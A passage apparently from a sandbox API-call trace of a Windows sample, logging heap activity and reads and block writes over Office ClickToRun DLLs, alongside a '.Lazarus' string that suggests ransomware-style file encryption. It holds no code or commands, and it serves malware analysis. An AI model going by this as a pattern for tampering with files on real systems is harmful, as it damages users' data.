(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.588] AreFileApisANSI () returned 1 [0077.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82058 [0077.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0077.588] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14115400, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0xc84c0)) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0077.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.588] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb4b54300, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x127260, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="C2R64.dll", cAlternateFileName="")) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.588] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0077.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0077.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0077.589] AreFileApisANSI () returned 1 [0077.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll", lpUsedDefaultChar=0x0) returned 68 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0077.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0077.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0077.589] AreFileApisANSI () returned 1 [0077.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0077.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x829e8 [0077.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x829e8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 68 [0077.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.590] GetFileType (hFile=0x430) returned 0x1 [0077.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x829e8 | out: hHeap=0x20000) returned 1 [0077.590] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.590] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.590] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.590] CloseHandle (hObject=0x430) returned 1 [0077.591] AreFileApisANSI () returned 1 [0077.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0077.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 68 [0077.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.591] GetFileType (hFile=0x430) returned 0x1 [0077.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0077.591] CloseHandle (hObject=0x430) returned 1 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.591] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.592] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0077.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.593] AreFileApisANSI () returned 1 [0077.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82298 [0077.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d738, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 68 [0077.593] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb4b54300, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x127260)) returned 1 [0077.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0077.593] AreFileApisANSI () returned 1 [0077.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0077.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0077.593] GetLastError () returned 0x0 [0077.593] SetLastError (dwErrCode=0x0) [0077.593] AreFileApisANSI () returned 1 [0077.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0077.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x825f8 [0077.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x825f8, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 68 [0077.593] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.594] GetFileType (hFile=0x430) returned 0x1 [0077.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x825f8 | out: hHeap=0x20000) returned 1 [0077.594] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0077.594] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0077.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0077.762] ReadFile (in: hFile=0x430, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0078.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0078.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0078.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e228 [0078.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x94680 [0078.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0078.017] GetLastError () returned 0x0 [0078.017] SetLastError (dwErrCode=0x0) [0078.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0078.017] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0078.017] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0078.018] WriteFile (in: hFile=0x430, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0078.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0078.018] CloseHandle (hObject=0x430) returned 1 [0078.055] AreFileApisANSI () returned 1 [0078.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0078.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82208 [0078.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll") returned 68 [0078.056] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0078.056] GetFileType (hFile=0x430) returned 0x1 [0078.056] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0078.259] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0078.259] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0078.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0078.260] ReadFile (in: hFile=0x430, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0078.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dff8 [0078.261] GetLastError () returned 0x0 [0078.261] SetLastError (dwErrCode=0x0) [0078.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0078.261] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0078.261] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0078.261] WriteFile (in: hFile=0x430, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0078.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0078.262] CloseHandle (hObject=0x430) returned 1 